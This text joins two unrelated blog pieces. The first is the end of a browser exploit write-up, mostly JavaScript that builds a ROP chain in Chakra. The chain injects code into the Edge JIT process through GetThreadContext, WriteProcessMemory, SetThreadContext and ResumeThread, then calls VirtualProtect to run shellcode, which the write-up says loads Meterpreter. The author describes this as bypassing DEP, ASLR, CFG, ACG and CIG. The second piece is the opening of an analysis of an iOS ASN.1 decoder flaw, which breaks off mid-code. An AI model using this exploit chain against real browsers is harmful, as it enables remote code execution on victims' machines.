    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write CONTEXT_ALL into CONTEXT.ContextFlags)
    next();

    // HANDLE hThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // LPCONTEXT lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!GetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // Locate CONTEXT.Rsp (ContextFlags address + 0x68) and store its address in .data of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);       // 0x1804c37c5: mov rax, qword [rcx] ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // ret gadget we want to overwrite our remote thread's RIP with
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
    next();

    // WriteProcessMemory() ROP chain (Number 4)
    // Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPCVOID lpBuffer (R8)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
    next();                                                                     // Recall RAX already has a writable pointer in it  

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();

    // SetThreadContext() ROP chain
    // Stage 10 -> Update our remote thread's RIP to return execution into our VirtualProtect ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // const CONTEXT *lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!SetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x7aa0, kernelbaseHigh); // KERNELBASE!SetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!SetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!SetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // ResumeThread() ROP chain
    // Stage 11 -> Resume the thread, with RIP now pointing to a return into our ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // Call KERNELBASE!ResumeThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x70a50, kernelbaseHigh); // KERNELBASE!ResumeThread address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!ResumeThread)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!ResumeThread - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
}
</script>

Let’s start by setting a breakpoint on a jmp rax gadget to reach our SetThreadContext call.

The first parameter we will deal with is the handle to the remote thread we have within the JIT process.

This brings our calls to the following states:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	-
);
ResumeThread(
	-
);

The next parameter we will set is the pointer to our updated CONTEXT structure.

We then can get SetThreadContext into RAX and call it. The call should be in the following state:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);

We then can execute our SetThreadContext call and hit our first ResumeThread gadget.

ResumeThread only has one parameter, so we will fill it and set up RAX BUT WE WILL NOT YET EXECUTE THE CALL!

ResumeThread(
	threadHandle				// A handle to the thread we want to resume (our thread we created via CreateRemoteThread)
);

Before we execute ResumeThread, we now need to attach another WinDbg instance to the JIT process. We will set a breakpoint on our ret gadget and see if we successfully control the remote thread!

Coming back to the content process, we can hit pt to execute our call to ResumeThread, which should kick off execution of our remote thread within the JIT process!

Going back to the JIT process, we can see our breakpoint was hit and our ROP chain is on the stack! We have gained code execution in the JIT process!

Our last step will be to walk through our VirtualProtect ROP chain, which should mark our shellcode as RWX. Here is how the call should look:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

Executing the ret gadget, we hit our first ROP gadgets, which set up the lpflOldProtect parameter. This can be any writable address.

We are now here:

VirtualProtect(
	-
	-
	-
	addressof(data_address) 			// Any writable address
);

The next parameter we will address is lpAddress, which is the address of our shellcode (the page we want to mark as RWX).

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	-
	-
	addressof(data_address) 			// Any writable address
);

Next up is dwSize, which we set to 0x1000.

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	-
	addressof(data_address) 			// Any writable address
);

The last parameter is our page protection, which is PAGE_EXECUTE_READWRITE.

We are now all set up!

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

After executing the function call, we have marked our shellcode as RWX! We have successfully bypassed Arbitrary Code Guard and have generated dynamic RWX memory!

The last thing for us is to ensure execution reaches our shellcode. After executing the VirtualProtect function, let’s see if we hit the last part of our ROP chain - which should push our shellcode address onto the stack, and return into it.

That’s it! We have achieved our task and we now can execute our shellcode!

An exploit GIF shall suit us nicely here!

Meterpreter is also loaded as a reflective, in-memory DLL, meaning we have taken care of CIG as well! That makes for DEP, ASLR, CFG, ACG, CIG, and no-child process mitigation bypasses! No wonder this post was so long!

Conclusion

This was an extremely challenging and rewarding task. Browser exploitation has been a thorn in my side for a long time, and I am very glad I now understand the basics. I do not yet know what is in my future, but if it is close to this level of complexity (I, at least, thought it was complex) I should be in for a treat! It is 4 a.m., so I am signing off now. Here is the final exploit on my GitHub.

Peace, love, and positivity :-)

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

By: Anonymous
7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as a quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021


The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of text. Transcript: Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts, as there was clearly something awesome lurking there, I made a mental note to diff the source code once Apple released it, which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the macOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c
index f338527..5b4915a 100644
--- a/OSX/libsecurity_asn1/lib/secasn1d.c
+++ b/OSX/libsecurity_asn1/lib/secasn1d.c
@@ -434,9 +434,6 @@ loser:
         PORT_ArenaRelease(cx->our_pool, state->our_mark);
         state->our_mark = NULL;
     }
-    if (new_state != NULL) {
-        PORT_Free(new_state);
-    }
     return NULL;
 }
 
@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,
     /*PORT_Assert (state->pending > 0); */
     PORT_Assert (state->place == beforeBitString);
 
-    if ((state->pending == 0) || (state->contents_length == 1)) {
+    if (state->pending == 0) {
                if (state->dest != NULL) {
                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);
                        item->Data = NULL;
                        item->Length = 0;
                        state->place = beforeEndOfContents;
-               }
-               if(state->contents_length == 1) {
-                       /* skip over (unused) remainder byte */
-                       return 1;
-               }
-               else {
-                       return 0;
+            return 0;
                }
     }

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.


The upper two bits of the first byte tell you the class of the type: universal, application, context-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 0 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 1 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length byte of 0x80 (the long-form flag with a count of zero), which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0, which is encoded as two NULL bytes.
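
To make the layout of that first byte concrete, here's a minimal C sketch which splits it into class, primitive/constructed flag and type identifier, plus a check for the end-of-contents marker. The names asn1_identifier, decode_identifier and is_end_of_contents are made up for this illustration and are not taken from NSS or Security.framework; identifiers which don't fit in 5 bits (0x1f) are not decoded any further.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper type for illustration; not an NSS/Security.framework type. */
typedef struct {
    uint8_t tag_class;    /* top two bits: 0 universal, 1 application,
                             2 context-specific, 3 private */
    bool    constructed;  /* bit 6: false = primitive, true = constructed */
    uint8_t tag_number;   /* low five bits; 0x1f means "encoded elsewhere" */
} asn1_identifier;

/* Split the first byte of a serialized ASN.1 object into its three fields. */
asn1_identifier decode_identifier(uint8_t first_byte)
{
    asn1_identifier id;
    id.tag_class   = (uint8_t)(first_byte >> 6);
    id.constructed = (first_byte & 0x20) != 0;
    id.tag_number  = (uint8_t)(first_byte & 0x1f);
    return id;
}

/* An end-of-contents marker is two zero bytes: identifier 0x00, length 0x00. */
bool is_end_of_contents(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);
    return len >= 2 && buf[0] == 0x00 && buf[1] == 0x00;
}
```

With this, decode_identifier(0x03) describes a universal, primitive type with identifier 3 (a bitstring), while decode_identifier(0x23) is the constructed form of the same type.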

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.
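
As a rough sketch of that layout, the C function below encodes a short primitive bitstring, working out the unused-bits byte from the number of valid bits. encode_short_bitstring is a hypothetical helper written for this example (it is not an NSS or Security.framework API), and it only handles lengths which fit in a single length byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Encode a short primitive BIT STRING (type identifier 0x03).
 * `bits` holds the payload packed most-significant-bit first and
 * `bit_count` is how many of those bits are valid.
 * Returns the number of bytes written to `out`, or 0 if it doesn't fit.
 */
size_t encode_short_bitstring(const uint8_t *bits, size_t bit_count,
                              uint8_t *out, size_t out_cap)
{
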